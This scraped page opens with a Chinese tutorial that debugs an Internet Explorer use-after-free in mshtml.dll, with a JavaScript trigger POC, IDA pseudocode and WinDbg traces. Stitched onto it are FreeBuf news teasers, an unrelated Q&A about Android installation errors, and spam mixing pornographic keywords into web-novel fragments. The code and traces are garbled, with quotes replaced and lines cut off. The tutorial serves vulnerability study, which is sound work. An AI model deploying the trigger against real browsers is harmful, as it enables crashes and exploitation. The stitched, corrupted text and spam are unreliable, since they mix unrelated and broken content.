前言Windows平台的漏洞挖掘和安全研究中,IE始终是绕不开的话题。IE漏洞就跟adobe系列一样经典,是学习exploit、shellcode的绝佳途径。在IE漏洞中,UAF即Use-After-Free是最为经典的一类。UAF可以这样简单理解:A先后调用B、C、D三个子函数,B会把A的某个资源释放掉;而D由于判断不严谨即使在B把A的资源释放后依然去引用它,比如某个指针,这时D引用了很危险的悬空指针;C是个什么角色呢?我们可以通过B分配数据。所以利用方法来了:构造奇葩的数据,让A调用B,B把A的某个指针释放掉;接着执行C,C赶紧分配内存,企图使用刚才释放掉的内存,同时我们可以控制这个内存;最后D被调用,由于检查不严格调用了已经释放掉的某指针,而该指针实际上已经被我们重用并且扭曲。漏洞被利用。但是学习IE的资料非常少,已知的大都是大牛们逆向mshtml.dll来的,辛辛苦苦得来的东西也不方便马上透露出来,所以自力更生是很重要的。我们希望了解IE运行机制,自己fuzz并找到有价值的漏洞。与此同时,能够调试已公布的漏洞,学习已有的POC,也是很重要的能力。所以这里选择CVE-这个经典的UAF来学习IE漏洞的调试。工具windbg、ida、各版本IE程序、xp/vista/win7/win8虚拟机windbg用于动态调试;IDA用于静态分析mshtml.dll——实现IE解释器的dll;各版本IE和windows是必不可少的。 基础知识出现一个新的漏洞,涉及到的解析过程我们并不一定分析过,所以分析漏洞的同时也是学习浏览器机制的好机会。比如CVE-这个漏洞,我们需要了解CTreeNode和元素的关系以及几个关键的函数实现。具体的结合POC和调试过程分析。 POC&html&&script&function trigger(){
Math.tan(3,4);
var id_0 = document.createElement(&sup&);
var id_1 = document.createElement(&audio&);
Math.sin(0);
document.body.appendChild(id_0);
document.body.appendChild(id_1);
Math.cos(0);
id_1.applyElement(id_0);
Math.tan(3,4);
id_0.onlosecapture=function(e){
document.write(&&);
Math.sin(0);
id_0[‘outerText’]=&&;
Math.cos(0);
id_0.setCapture();
Math.tan(3,4);
id_1.setCapture();
Math.sin(0);}window.onload = function() {
trigger();}&/script&&/html&调试技巧用windbg载入IE时设置jscript!tan、jscript!sin、jscript!cos断点,逐语句分析。也可以将POC页面设置为IE主页,便于直接载入。结合IDA对mshtml.dll分析相关函数。 漏洞原理id_1.setCapture时,进入CDoc::PumpMessage;获取Element的TreeNode,调用CDoc::ReleaseDetachedCaptures();参数为0调用CDos::SetMouseCapture,进入CDos::ClearMouseCapture,调用CElement::FireEvent,触发事件导致id_0.onlosecapture指定的js函数调用,document.write(“”),该函数将所有对象释放CBodyElement的CTreeNode也被释放。然后返回PumpMessage,CDos::HasContainerCapture被调用,它引用了释放的CTreeNode对象。UAF发生。看下面IDA静态分析的代码。int __userpurge CDoc::SetMouseCapture&eax&(int a1&eax&, LPVOID lpMem, int a3, int a4, int a5, int a6, int a7){
int v7; // ebx@1 // edi@1 // eax@3
int v10; // esi@9
int v11; // ecx@16
int v12; // eax@22
int v13; // ST14_4@28
char v14; // [sp+10h] [bp-98h]@21
int v15; // [sp+14h] [bp-94h]@21
int v16; // [sp+A4h] [bp-4h]@5
void *lpM // [sp+B0h] [bp+8h]@7
v7 = (int)lpM
flag = a1;
if ( *((_WORD *)lpMem + 938) & 0x1000 )
if ( flag )
v16 = (*((_DWORD *)lpMem + 65) && 2) - 1;
result = v16;
if ( v16 & 0 )
goto LABEL_33;
v11 = *((_DWORD *)lpMem + 67) + 4 * v16;
if ( *(_DWORD *)(*(_DWORD *)v11 + 8) == flag )
while ( result &= 0 );
if ( result & 0 )
{LABEL_33:
result = ATL_malloc(0x10u);
if ( result )
result = CElementCapture::CElementCapture(result, a6, a7, a3, a4);
lpMema = (void *)
lpMema = 0;
if ( lpMema )
v10 = CDoc::GetLastCapture(v7);
if ( v10 && CDoc::HasContainerCapture(v7) )
CMessage::CMessage(&v14, 0);
v15 = 533;
CDoc::PumpMessage(v7, (int)&v14, 0, 0);
if ( v10 == CDoc::GetLastCapture(v7) )
v12 = *(_DWORD *)(v10 + 12);
if ( !(v12 & 2) )
if ( !(*(_DWORD *)(*(_DWORD *)(v10 + 8) + 28) & 0x8000000) )
*(_DWORD *)(v10 + 12) = v12 | 2;
*(_DWORD *)(v7 + 1876) |= 0x1000u;
CElement::FireEvent(&s_propdescCElementonlosecapture, 1, 0, -1, 0, 0);
*(_DWORD *)(v7 + 1876) &= 0xFFFFEFFFu;
if ( *(_DWORD *)(v7 + 260) & 0xFFFFFFFC )
if ( v10 == CDoc::GetLastCapture(v7) )
CElementCapture::_CElementCapture();
CBlockElement::operator delete((LPVOID)v10);
CImplPtrAry::Delete(v13, v7 + 256);
CImplPtrAry::Append();
CElementCapture::_CElementCapture();
CBlockElement::operator delete(lpMema);
result = CMessage::_CMessage();
result = CImplPtrAry::Append();
if ( !v10 )
result = CServer::SetCapture(1);
result = CDoc::ClearMouseCapture(lpMem, 0);
}}调试过程0:008& bl 1 e 633b87ca
0:**** jscript!sin 2 e 633b5cea
0:**** jscript!tan 3 e 633b8820
0:**** jscript!Cos三个断点下好。根据POC的执行流程来。首先是createElement,我们在CDocument::createElement下断,获取ld_0和ld_1的element对象地址。ld_0 element对象地址为 0020aad8。同时可以看到createElement的调用栈。在同一位置下断,获取ld_1的对象地址。0:008& bp eipLd_1对象地址为 0021cee8。下面的语句:document.body.appendChild(id_0);document.body.appendChild(id_1); 在CElement::appendChild下断。获取element对应的CTreeNode对象。该函数最后调用 mshtml!CMarkup::InsertElementInternal完成操作,在InsertElementInternal内部调用CTreeNode构造函数。ld_0 对应的 CTreeNode对象地址为 03291fc8。ld_1对应的 CTreeNode对象地址为。同时可以发现 CTreeNode-&CElement。Element偏移为0。0:008& dc 0021cee80021cee8
635db4c8 e20
..]c........ N..0021cef8
003bd060 00
).u.......Element偏移0x14为其对应的CTreeNode结构。id_1.applyElement(id_0);语句和appendChild执行过程差不多,我猜测appendChild是将两个元素插入DOM树,而applyElement是将id0和id1的CTreeNode对象变成父子关系。看看ld0和ld1的对象和CTreeNode对象发生了什么变化:之前:Ld0 ctreenode0:008& dc 0020aad8 00203f10 ffff0060 ffffffff
.. ..? .`.......000
................ Ld1 ctreenode0:008& dc 21cee8 00203f10 ffff0275 ffffffff
..!..? .u.......fe0 02ccd4f8
a........o......完成这个操作之后:Ld0 ctreenode0:008& dc 0020aad8 01
.. ..? .`.......048 02da6ec8
a.......H )..n.. Ld1 ctreenode0:008& dc 21cee8 001
..!...).u.......00 03291ff0
Q.............). 一个疑似链表结构出现。DOM对象也是链接起来的。也说明00203f10是CBodyElement对应的CTreeNode。0:008& dc dae60 10000
.f..`& ..b......e18 03291fd8
Q........& ...).接下来是一个设置,ld0的onlosecapture失去聚焦时执行的函数,页面清空。然后id_0['outerText']=&&;,js不太熟悉,这个操作执行之后id0应该会从DOM树脱离下来。Id1作为儿子也会脱离DOM树。应该是这样。Ld1先被release。然后是ld0。此时再看ctreenode地址:0:008& dc 0200 ffff0060 ffffffff
.. .....`.......000
Q............... 0:008& dc 00000 ffff0075 ffffffff
9.!.....u.......00
Q...............已经被释放了。然后进入重点SetMouseCapture。Eax = 20aad8。mshtml!CDoc::SetMouseCapture:635ddca3 8bff
edi,edi635ddca5 55
ebp635ddca6 8bec
ebp,esp635ddca8 81ec9c000000
esp,9Ch635ddcae 53
ebx635ddcaf 8b5d08
ebx,dword ptr [ebp+8]635ddcb2 66f010 test
word ptr [ebx+754h],1000h635ddcbb 56
esi635ddcbc 57
edi635ddcbd 8bf8
edi,eax635ddcbf 0f
mshtml!CDoc::SetMouseCapture+0x1e (637fd32b)635ddcc5 33f6
esi,esi635ddcc7 3bfe
edi,esi635ddcc9 0f857d860d00
mshtml!CDoc::SetMouseCapture+0x32 (636b634c) [br=1]会跳转:636b634c 8b
eax,dword ptr [ebx+104h]636b
eax,2636b6355 48
eax,esi636bfc
dword ptr [ebp-4],eax636b635b 0f8dd16f1400
mshtml!CDoc::SetMouseCapture+0x43 (637fd332)636b
10h636bf7ff
mshtml!operator new ()636b
eax,esi636b636a 59
ecx636b636b 7466
mshtml!CDoc::SetMouseCapture+0x8b (636b63d3)636b636d ff7510
dword ptr [ebp+10h]636bd14
ecx,dword ptr [ebp+14h]636b6373 ff750c
dword ptr [ebp+0Ch]636b
edx,edi636b6378 ff751c
dword ptr [ebp+1Ch]636b637b ff7518
dword ptr [ebp+18h]636b637e 50
eax636b637f e
mshtml!CElementCapture::CElementCapture (636b63dd)636b
dword ptr [ebp+8],eax636b
dword ptr [ebp+8],esi636b638a 0fff
mshtml!CDoc::SetMouseCapture+0x1ae (635ddcd6)636b6390 8bcb
ecx,ebx636b6390 8bcb
ecx,ebx636be0f3ff
mshtml!CDoc::GetLastCapture (635f448d)636b
esi,eax636b
esi,esi636b639b 897510
dword ptr [ebp+10h],esi636b639e 0f85b06f1400
mshtml!CDoc::SetMouseCapture+0xab (637fd354)636b63a4 8b7d08
edi,dword ptr [ebp+8]636b63a7 8db
esi,[ebx+100h]636b63ad e88456f8ff
mshtml!CImplPtrAry::Append (6363ba36)636b63b2 837d1000
dword ptr [ebp+10h],0636b63b6 0f851a79f2ff
mshtml!CDoc::SetMouseCapture+0x1ae (635ddcd6)636b63bc 6a01
1636b63be 8bf3
esi,ebx636b63c0 e880d9ffff
mshtml!CServer::SetCapture (636b3d45)636b63c5 e90c79f2ff
mshtml!CDoc::SetMouseCapture+0x1ae (635ddcd6)相当于走了如下流程:if ( v10 && CDoc::HasContainerCapture(v7) ) {}Else {result = CImplPtrAry::Append();if ( !v10 )result = CServer::SetCapture(1);}当id1执行SetMouseCapture时,情况就不一样了,这是GetLastCapture不为空。执行如下流程:CDoc::PumpMessage(v7, (int)&v14, 0, 0); 636b639e 0f85b06f1400
mshtml!CDoc::SetMouseCapture+0xab (637fd354) [br=1]......637fd354 8b7f14
edi,dword ptr [edi+14h] ds:cefc=637fd357 8bcb
ecx,ebx637fd359 e80271dfff
mshtml!CDoc::HasContainerCapture (635f4460)637fd35e 85c0
eax,eax637fd360 0f843e90ebff
mshtml!CDoc::SetMouseCapture+0x191 (636b63a4)637fd366 33ff
edi,edi637fd368 57
edi637fd369 8d8568ffffff
eax,[ebp-98h]637fd36f 50
eax637fd370 e8bdc3efff
mshtml!CMessage::CMessage (636f9732)637fd375 57
edi637fd376 57
edi637fd377 8d8568ffffff
eax,[ebp-98h]637fd37d 50
eax637fd37e 8bcb
ecx,ebx637fd380 c7856cffffff mov dword ptr [ebp-94h],215h637fd38a e8386adfff
mshtml!CDoc::PumpMessage (635f3dc7)637fd38f 8bcb
ecx,ebx进入PumpMessage函数。有点类似win32的消息处理。跟一下会走到什么地方。敏感调用:635f3f68 8b4014
eax,dword ptr [eax+14h]635f3f6b
dword ptr [esp+10h],eax635f3f84 57
edi635f3f85 e815feffff
mshtml!CDoc::ReleaseDetachedCaptures (635f3d9f)0:008& r eaxeax=00203f10发现eax正是CBodyElement对应的CTreeNode。函数内部接着跟,发现这个:637fd484 52
edx637fd485 33c9
ecx,ecx637fd487 51
ecx637fd488 52
edx637fd489 52
edx637fd48a 6a01
1637fd48c 50
eax637fd48d 33c0
eax,eax637fd48f e80f08deff
mshtml!CDoc::SetMouseCapture (635ddca3)寄存器值:0:008& reax= ebx= ecx= edx= esi=0020aad8 edi=00195de8又一次调用SetMouseCapture,这时eax = 0,走的流程我们可以跟一下:mshtml!CDoc::SetMouseCapture:635ddca3 8bff
edi,edi635ddca5 55
ebp635ddca6 8bec
ebp,esp635ddca8 81ec9c000000
esp,9Ch635ddcae 53
ebx635ddcaf 8b5d08
ebx,dword ptr [ebp+8]635ddcb2 66f010 test
word ptr [ebx+754h],1000h635ddcbb 56
esi635ddcbc 57
edi635ddcbd 8bf8
edi,eax635ddcbf 0f
mshtml!CDoc::SetMouseCapture+0x1e (637fd32b)635ddcc5 33f6
esi,esi635ddcc7 3bfe
edi,esi635ddcc9 0f857d860d00
mshtml!CDoc::SetMouseCapture+0x32 (636b634c)635ddccf 56
esi635ddcd0 53
ebx635ddcd1 e
mshtml!CDoc::ClearMouseCapture (636254ed)调用ClearMouseCapture,注意此时ld1的SetCapture还没有完成,也就是说焦点依然在ld0。ClearMouseCapture显然会触发document.write那句话。按理说这句话应该把所有对象清除。但是我调试的过程中并没发生异常。继续跟一下。接着在PumpMessage中:0:008& r ediedi=00203f100:008& r ecxecx=00195de80:008& dc edida00b2
ffff6410 ffffffff
.........d......00
q...............0:008& dc ecx0633f18 000a8
.?cc............03bcfc 078efc
......cc.]......635f587a 8b7c2410
edi,dword ptr [esp+10h]635f587e 8b4c2414
ecx,dword ptr [esp+14h]635febffff
mshtml!CDoc::HasContainerCapture (635f4460)确实CBodyElement对应的CTreeNode不太一样了。跟进看看:mshtml!CDoc::HasContainerCapture:635f4460 8bff
edi,edi635f4462 55
ebp635f4463 8bec
ebp,esp635f4465 51
ecx635f4466 56
esi635f000
mshtml!CDoc::GetLastCapture (635f448d)635f446c 8bf0
esi,eax635f446e 33c0
eax,eax635f
edi,eax635f0210c00
mshtml!CDoc::HasContainerCapture+0x1b (636b65a8)635ff
ecx,dword ptr [edi]
ds:f10=02da00b2635f447a 894dfc
dword ptr [ebp-4],ecx这里出问题了应该。CBodyElement查找出现问题。 接着跟PumpMessage:ecx=00203f10 edi=00203f10635f3fd9 8bcf
ecx,edi635f3fdb 897c241c
dword ptr [esp+1Ch],edi635f3fdf e82eed0600
mshtml!CTreeNode::NodeAddRef (63662d12)还是跟进看:mshtml!CTreeNode::NodeAddRef:bff
dword ptr [ebp-4],063662d1c e82cffffff
mshtml!CTreeNode::AddRef (63662c4d)14002
byte ptr [ecx+40h],2fff
mshtml!CTreeNode::NodeAddRef+0x26 (635f367d)d45fc
eax,[ebp-4]
eaxe0976363
offset mshtml!IID_IUnknown ()
ecx7000000
mshtml!CTreeNode::GetInterface (63662d41)63662d3a c9
leave63662d3b c3
ret代码非常简单 跟进GetInterface看,找到了出问题的代码:63662dbe 8b03
eax,dword ptr [ebx]
ds:f10=02da00b26b08
ecx,dword ptr [eax]
ds:b2=63662dca ff11
dword ptr [ecx]找到问题了,就是之前把CTreeNode改掉了,导致CBodyElement对象寻址错误。典型的UAF漏洞。IE对该漏洞进行补丁,将进入PumpMessage的判断条件修正了一下:如果对象已经不在DOM树上,将不进入PumpMessage。补丁前:补丁后:[本文作者/dedogger,本文属Freebuf原创奖励计划,未经许可禁止转载]
文章为作者独立观点,不代表微头条立场
的最新文章
今日端午,咱们聊点别的。纠正一个错误:端午原为纪念伍子胥而设,非为屈原。微信号:freebuf事实上并不存在我说的这种分类,即生态级公司和平台级公司之间没有必然需要这么做,必然需要微信号:freebuf新一波针对IP电话的攻击已目标瞄准了英国企业。安全专家们认为,地下犯罪市场中黑客工具的微信号:freebuf对于密码,我们究竟还能做些什么呢?密码密码,难说爱你通常我们建议用户采用独特、复杂、最微信号:freebuf轮番攻击日17点31分,阿里云某用户A反馈业务遭受到大流量攻击,攻击微信号:freebuf这个夏天,黑客峰会之间的“混战”愈发激烈——除了老牌子Black Hat、XCON、O微信号:freebuf《星期日泰晤士报》披露,中国和俄罗斯已经联合破解了斯诺登泄密文件。英国情报机关MI6因微信号:freebuf荷兰用户在登录英国卫报、美国赫芬顿邮报、法国世界报等世界主流新闻网站时,会遇到被加载的微信号:freebuf微软在去年曾宣布WinXP系统寿终正寝,不再对它进行更新维护,如今终于轮到了Windo微信号:freebuf戴尔SecureWorks的安全人员周一披露了一种名为Stegoloader的恶意程序微信号:freebuf如今U盘的存储和数据传输能力已经非常强了,可以跨各类平台运行,存储空间甚至达到了256微信号:freebuf俗话说进攻是最好的防御,而这与信息安全世界并没有什么不同。通过这15个故意存漏洞网站来微信号:freebufLastPass致用户:请更改你的主密码,并立即启用双因素身份验证!作为当前全球最热门微信号:freebuf卡巴斯基实验室近日公开承认其公司网络遭APT攻击,而且被入侵长达数月未发现,经卡巴斯基微信号:freebufIOActive安全公司CTO、网络安全专家Cesar Cerrudo近日表示,他们已微信号:freebuf下面就是我的亲身经历。二手电脑最近,我想买台新电脑,就是那种低端笔记本,可以应付一些轻微信号:freebuf你可以想象一下,如果一个专制国家得到了一种能够获取用户个人隐私信息的工具,而且这种工具微信号:freebufA:这世道真是什么也不敢相信了。你知道吗,我一朋友的银行卡昨天被盗刷了,而且奇怪的是他微信号freebuf本周二,6国政府组织联合逮捕了49名网络犯罪嫌疑犯,他们与和“Operation Tri微信号:freebuf介绍相信很多开发者都默认Docker这样的容器是一种沙盒(sandbox)应用,也就是微信号:freebuf这个世界是多面的,只是在不同的场景下会呈现出不同的面。而在我们所处的网络时代中,世界向微信号:freebuf前段时间在微博上看到tk教主貌似想拍黑客题材的电影,还有看《战狼》等等不忍直视的电影,微信号:freebuf在YouTube有个视频演示了facebook的社交通讯工具WhatsApp的一个问题微信号:freebuf这是一个真实的事件——暗网地下黑市中普通运营商之间的暗战。几周前,笔者曾发布了一篇关于微信号:freebuf纵深防御这个在安全行业被用的很烂的词,乙方的顾问写方案时信手捏来,我想大家的理解可能并微信号:freebuf知名反诈骗网络安全公司TrapX 发现了医疗领域一个新近流行的攻击手段,可以将这类攻击微信号:freebuf过去大家应该听说过美国用无人机监控公民隐私,也听说过企业用无人机作秀招徕顾客,更听说过微信号:freebuf北京时间今天上午8点左右,著名的0day黑市网站1337day在其Facebook上发微信号:freebuf近日安全研究人员发布了一份漏洞利用代码。这份代码表明,攻击者可以通过足以以假乱真的钓鱼微信号:freebufFreeBuf黑客与极客联合GeekPwn发起“中国黑客生存状况调查”现已新鲜出炉,调微信号:freebuf前言上周,360发布了海莲花的报告,数据收集,分析,解释,加工方面很能让人折服,但是看微信号:freebufFreeBuf作为盘古越狱团队主办的第一届MOSEC移动安全技术峰会指定支持媒体,两位微信号freebuf恶意软件分析专家最近发现一款Zeus网银木马的变体,在分析期间该木马竟然完全“隐身”于杀微信号freebufLinux是工具,更像一个信仰。写在前面本文目的不是教你如何成为一个真正的Linuxer微信号freebuf转自V2EX:前几天打 ACTF 决赛进了第三名(我好渣qwq),奖品是一堆百度杀毒的U微信号freebufWAIDPS是一个Python编写的无线入侵检测工具,基于Linux平台,完全开源。它可微信号freebuf安全研究人员将一款电动玩具打造为“开锁神器”,可在几秒内打开几乎任何有固定密码的车库门。freebuf国内关注度最高的全球互联网安全新媒体热门文章最新文章手机能下找不能安装?显示无法获取软件安装包,情捡查SDCARD是否正常插入?x6-中国学网-中国IT综合门户网站
> 手机能下找不能安装?显示无法获取软件安装包,情捡查SDCARD是否正常插入?x6
手机能下找不能安装?显示无法获取软件安装包,情捡查SDCARD是否正常插入?x6
转载 编辑:李强
为了帮助网友解决“手机能下找不能安装?显示无法获取软件安装”相关的问题,中国学网通过互联网对“手机能下找不能安装?显示无法获取软件安装”相关的解决方案进行了整理,用户详细问题包括:谢谢,具体解决方案如下:解决方案1:把存储卡拔出来重新装一下解决方案2:谢谢通过对数据库的索引,我们还为您准备了:答:你好 我想可能是你的手机内存不足 你可以去下载一个应用宝 然后在应用宝中的手机优化中优化一下手机 让手机空出一点内存 你还可以在应用宝中的应用管理中将一些软件移到SD卡中 这样也能让你手机空出很多内存 应该就能获取安装包了 希望能帮到你 ===========================================答:开着流量,再装试下===========================================问:谢谢答:把存储卡拔出来重新装一下===========================================问:谢谢答:您好: 根据您的描述,建议您按照以下方法尝试:1.重新下载安装尝试。2.若其他第三方软件可以正常使用,只有此软件不能可能与手机系统存在兼容性问题。3.手机内存不足导致软件不能正常安装,建议您将手机内存储的多媒体文件移动至外置SD卡中扩展...===========================================问:谢谢答:重新刷新下===========================================问:我手机是三星8552,用安卓市场下载完软件点击安装总说无法获取软件安装...答:设置里找到未知源勾选,用手机管家一类的软件,找到下载的安装包安装===========================================问:我手机是三星8552,用安卓市场下载完软件点击安装总说无法获取软件安装...答:把存储卡拔出来重新装一下===========================================问:出现 软件未被安装的文字答:这种情况有可能是以下几种原因: 你的SD卡有异常,导致无法读到刚下载下来的安装软件,因此无法安装。 安卓市场软件故障,可以尝试重装安卓市场,或使用91手机助手等其他软件下载,看有没有问题。 有进程阻止安装,导致无法获取安装包。 如有用...===========================================问:求解答。答:您好: 这样的提示是因为手机找不到SD导致的,可能是您的SD坏了或者接触不良,拆下SD卡重新插上试试,如果还是不行的话那就是手机不能正常读取SD或者是那个存有游戏的文件夹有毒导致禁止读取,建议您在确定手机可以正常运行并可以读取SD其他的文...=========================================== 不能安装1.看下你下载的版本对不对2.看下你手机支持下载么3.看下你的证书可以使用么=========================================== 别用91 苹果杀手 我刚接到一个91的问题 建议LZ用 ITUNES 使用方法 LZ去网上问问就可以了 或者去威锋网=========================================== 刷机吧,过程其实挺简单的,不用怕刷成砖,刷成砖也还是可以刷活的=========================================== 一般系统放任何一张SD卡进去都有自己加载一些文件进去的,你的这个不怎么清楚,换个ROM试试,虽然麻烦===========================================1.请检查数据线是否完好,连接上并不代表可以用!2.usb设备坏了3.你是不是插上了新的硬件,需要安装驱动。===========================================你越狱了么?没越狱的苹果只能从app store里下载应用,安装包不管用,如果你不想越狱,你试试pp助手,如果你想越狱,evasion===========================================下载软件到手机,首先要确认下载的软件安装文件类型是否适用于你的操作系统,如果版本不符,当然不能安装,也找不到描述文件显示。如果排出版本不符问题了,就看手机硬件是...===========================================可通过网上刷机教程进行获取root 权限 2:手机系统版本问题,有些软件需要的系统版本要高,低版本的无法进行软件安装 3:中兴U880手机玩一些游戏时要加载3D插件,才可以让游...===========================================手机卫士安装不上,安装时报错,或者安装后找不到都是恶意程序导致的。 您安装上小工具之后,运行小工具,如果手机已经root,提示你给它授权,你选择允许,然后查杀恶意软件--清...===========================================这样的情况一般是在手机助手指定了安装位置,如果指定安装在手机,而手机内存空间已满,就会提示无法安装,请清理手机空间然后安装。 或者指定安装位置为SD卡,有些软件限...===========================================
本文欢迎转载,转载请注明:转载自中国学网: []
用户还关注
可能有帮助巨乳少妇插妹妹影院,肛交种子
友情链接:成人性爱视频观看,碧玺手链价格图片,错就多多分享本站!谢谢各位读者的支持!
错就多多分享本站!谢谢各位读者的支持!
“害羞你个大头鬼,你这种人也知道害羞?”
“你干嘛?”程美不爽地甩开程一的手。“还能怎一2014av人气排行榜路向西吉吉影音动画村么办?县令大人我们可得罪不起,程甜再不想嫁也得嫁。那亲事可是她自己求来的活该。”&&&&
轻轻的摇了几下高脚杯里的红酒,一脸爽快的看着风骚四,气得风骚四就想过去给他狠狠一脚,将这混蛋给踢飞出去,这红酒可是自己最爱喝的法国红酒,每年都是限量生产的,没想到这混蛋竟然不吱一声就大摇大摆的走过去将自己的那瓶法国限量版的红酒给喝了。&&&&
程一轻巧的说道:“碧玺手链价格图片大伯父,现在您知道自己是长辈了。刚才你怀疑我们偷你东西的时候。你怎么不想想我是你侄女,我爹是你亲弟弟。您置我们的名誉于何顾!?您还是赶紧赔礼道歉。这父老乡亲可是都看着呢。”&&&& 2014av人气排行榜
wWw.qududu.coM提供无弹窗全文字在线阅读,更新速度更快文章质量更好,如果您觉得不错就多多分享本站!谢谢各位读者的支持!&&&&
“害羞你成人性爱视频观看个大头鬼,你这种人也知道害羞?”&&&&
程一的话得到了读马鞍山市种子酒总代理书人王阿康的赞同,信服力加倍。引得王大鸣、王进财议论纷纷。&&&&
“算命看相?准不准啊?”&&&&
wWw.qududu.coM高速首发农家商女最新章节,本章节是106 让冲突来得更猛烈些地址为如果你觉的本章节还不错的话请不要忘记向您QQ群和微博里的朋友推荐哦!&&&& 罗元见不是在开玩笑,拖着肥胖的躯体走了。&&&&
而此时,坐在酒吧包间一侧的四个男性牲口都快看不下去了,特别是其中的两个青年人,愤愤不平,早就已经撸起袖子。&&&&
友情链接:
